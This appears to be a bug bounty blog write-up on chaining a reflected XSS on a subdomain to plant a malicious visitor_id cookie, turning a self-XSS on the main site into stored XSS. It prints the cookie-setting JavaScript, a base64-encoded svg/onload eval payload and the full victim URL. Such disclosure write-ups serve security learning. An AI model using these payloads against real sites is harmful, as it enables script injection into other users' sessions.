  • From Unexploited XSS To Self Stored XSS on victim Cookies
    BugBounty 2021. 3. 22. 06:01

    Day #1

    This is part 2 of this story. I will talk about a self XSS via cookies and how I exploited it through an out-of-scope subdomain. Our target is redact.com. First, how did I find the vulnerable cookie attribute? While browsing redact.com I stopped at the path www.redacted.com/redactedfolder/redactedpage/ID and used Param Miner (brute force) to look for hidden parameters. I found two, but unfortunately both were filtered, so I turned to guessing cookie parameters.


    Finally I found a cookie attribute named visitor_id whose value was injected into the JS source code.


    Now I have a self XSS, which is out of scope. But a subdomain can set a cookie for the main domain, so I will exploit it through an out-of-scope subdomain.

    Day #2

    I extracted subdomains, and after 1h/2h I found a reflected XSS on a sub named http://dev-labs.redact.com/login?username=[Here]. So we will set the cookie from the subdomain for the main domain. [Hope you understand the exploitation; if not, please watch the video

    https://www.youtube.com/watch?v=ntWOiuKe5ts&feature=youtu.be&ab_channel=DawidCzagan]


    So our exploit:


    document.cookie='visitor_id=w0; domain=.redact.com; path=/;' ;document.location=" https://www.redact.com/redactfolder/redactpage/1337 "


    Let's encode it:


    </Script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxv
    YWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50Lmxv
    Y2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>


    So now we have a valid PoC. We send the URL to the victim:


    http://dev-labs.redact.com/login?username=</script><svg/onload=eval(atob('+ZG9jdW1lbnQuY29va2llPSd
    2aXNpdG9yX2lkPXcwPC9zY3JpcHQPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0L
    mNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9y
    ZWRhY3RwYWdlLzEzMzci'))>


    The page will automatically redirect us to the main domain with the visitor_id cookie and payload set, because we added the redirect via document.location. It works :D
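The sink this post exploits is a cookie value echoed into inline JavaScript. As an added example (not the author's code or the target's), here is that pattern in a small Node template, next to a hardened version and a response-side check that flags a break-out. Only the cookie name visitor_id comes from the post; the template shape, helper names and the sample request are assumptions.

```javascript
// Added example, not code from the original post: the cookie-to-inline-script
// sink described above, as the vulnerable pattern next to a hardened version.
// The cookie name visitor_id is from the post; everything else (template
// shape, helper names, the sample request) is assumed for this demonstration.

// Minimal Cookie request-header parser: "a=1; b=2" -> { a: "1", b: "2" }.
// Values are kept raw, as document.cookie would hand them to the page.
function parseCookies(header) {
  const cookies = {};
  for (const part of header.split(";")) {
    const eq = part.indexOf("=");
    if (eq < 0) continue;
    const name = part.slice(0, eq).trim();
    if (name) cookies[name] = part.slice(eq + 1).trim();
  }
  return cookies;
}

// Vulnerable: the cookie value is concatenated straight into a <script>
// block. The HTML parser ends the script element at the first "</script",
// so a value containing it turns the remainder into live markup.
function renderVulnerable(cookieHeader) {
  const { visitor_id = "" } = parseCookies(cookieHeader);
  return `<script>var visitorId = '${visitor_id}';</script>`;
}

// Hardened: emit a JSON string literal and additionally escape "<", ">", "&"
// and the line terminators U+2028/U+2029, so neither "</script>" nor any
// other tag can appear literally inside the script block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderHardened(cookieHeader) {
  const { visitor_id = "" } = parseCookies(cookieHeader);
  return `<script>var visitorId = ${jsStringLiteral(visitor_id)};</script>`;
}

// Response-side check: this template has exactly one closing script tag, so
// a second "</script" in the rendered HTML means the cookie broke out.
function scriptBreakout(html) {
  return (html.match(/<\/script/gi) || []).length > 1;
}

// Constructed request carrying a break-out value in the cookie.
const SAMPLE_COOKIE = "visitor_id=w0</script><svg/onload=alert(1)>; theme=dark";
console.log("vulnerable breaks out:", scriptBreakout(renderVulnerable(SAMPLE_COOKIE)));
console.log("hardened breaks out:  ", scriptBreakout(renderHardened(SAMPLE_COOKIE)));
```

The same escaping applies to any request-controlled value (cookie, header or parameter) that lands inside a script block; a tight allow-list on visitor_id (for example, only alphanumerics) is a sensible second layer.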

    Timeline

    Jan 02 - Reported via HackerOne

    Jan 04 - HackerOne staff updated the severity from High to Medium (6.1)

    Jan 07 - Report triaged and bounty paid by program staff


    That's all, thank you very much for reading to the end. I hope you enjoyed it.


    Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters
